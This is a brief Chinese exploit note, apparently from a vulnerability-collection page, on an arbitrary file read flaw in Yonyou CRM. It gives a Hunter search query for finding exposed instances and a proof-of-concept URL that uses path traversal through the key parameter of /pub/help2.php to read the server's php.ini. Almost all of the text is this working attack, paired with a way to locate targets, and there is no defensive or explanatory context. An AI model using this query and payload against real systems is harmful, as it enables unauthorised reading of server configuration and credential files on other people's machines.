登录 白背景

用友CRM 任意文件读取漏洞

hunter

app.name="用友 CRM"

poc

http://127.0.0.1:9000/pub/help2.php?key=../../apache/php.ini

image